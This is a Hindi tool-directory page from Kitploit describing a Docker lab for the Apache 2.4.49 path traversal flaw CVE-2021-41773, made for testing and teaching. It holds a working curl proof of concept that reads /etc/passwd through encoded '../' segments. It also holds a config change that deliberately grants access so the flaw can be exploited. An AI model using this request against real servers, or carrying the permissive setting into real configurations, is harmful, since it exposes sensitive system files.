Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2021-41773 — CVE-2021-41773 Apache पथ ट्रैवर्सल भेद्यता के लिए डॉकर-आधारित प्रयोगशाला वातावरण, सुरक्षा परीक्षण और शिक्षा के लिए PoC शोषण और विस्तृत वॉकथ्रू के साथ। | Kitploit
उपकरण/GitHubGitHub/jiyun02/cve-2021-41773
भेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubjiyun02/cve-2021-41773

cve-2021-41773

CVE-2021-41773 Apache पथ ट्रैवर्सल भेद्यता के लिए डॉकर-आधारित प्रयोगशाला वातावरण, सुरक्षा परीक्षण और शिक्षा के लिए PoC शोषण और विस्तृत वॉकथ्रू के साथ।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-41773 – Apache Path Traversal रिपोर्ट


सारांश

  • Apache HTTP सर्वर 2.4.49 संस्करण में पाया गया दोष, जो वेब सर्वर कॉन्फ़िगरेशन के आधार पर पथ ट्रैवर्सल हमले के माध्यम से सिस्टम की संवेदनशील फ़ाइलों को उजागर कर सकता है
  • पथ ट्रैवर्सल: हमलावर ../ सहित पथों का उपयोग करके वेब रूट के बाहर की फ़ाइलों तक पहुँच सकता है

जानकारी

  • दोष का नाम: CVE-2021-41773
  • प्रभावित संस्करण: Apache HTTP सर्वर 2.4.49
  • दोष का प्रकार: पथ ट्रैवर्सल
  • आधिकारिक पैच स्थिति: 2.4.50 और उससे ऊपर में पैच किया गया

अभ्यास पर्यावरण सेटअप

  • बेस इमेज: 'httpd:2.4.49' (DockerHub)
  • कंटेनर संचालन विधि: Dockerfile + docker-compose.yml
  • रन पोर्ट: 8080 → कंटेनर के 80 पोर्ट से जुड़ा
  • Apache सेटिंग बदलाव: 'Require all granted' में संशोधित (पथ ट्रैवर्सल सक्षम करने के लिए)

पर्यावरण चलाने की विधि

  • git clone https://github.com/JIYUN02/cve-2021-41773.git
  • cd cve-2021-41773
  • docker-compose up --build

दोष PoC

  • curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

विस्तृत प्रक्रिया

  1. असाइनमेंट के लिए निर्देशिका चलाएँ image
image
  1. Dockerfile बनाएँ image

-> बेस इमेज: httpd:2.4.49 (दोष वाला संस्करण)

-> 'sed -i 's/Require all denied/Require all granted/g' : पथ ट्रैवर्सल की अनुमति और बाहरी पहुँच

  1. docker-compose.yml image

-> Apache परिभाषा

-> 8080 पोर्ट को कंटेनर के 80 पोर्ट से मैप करना

  1. Docker चलाएँ

    image
  2. PoC चलाएँ

    image

-> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

-> /etc/passwd में संवेदनशील जानकारी होती है, %2e .. का एन्कोडेड शब्द है जो ऊपरी निर्देशिका में जाने का आदेश है

-> पथ में हेरफेर करके सर्वर को /etc/passwd तक पहुँचने और इसे आउटपुट करने के लिए बाध्य करता है

  1. निष्पादन परिणाम image

-> उपरोक्त चित्र के अनुसार संवेदनशील निर्देशिका तक पहुँच संभव


Fork के माध्यम से सुलभ रिपॉजिटरी URL

https://github.com/JIYUN02/cve-2021-41773

-> कमिट इतिहास मौजूद है

टूल डाउनलोड करें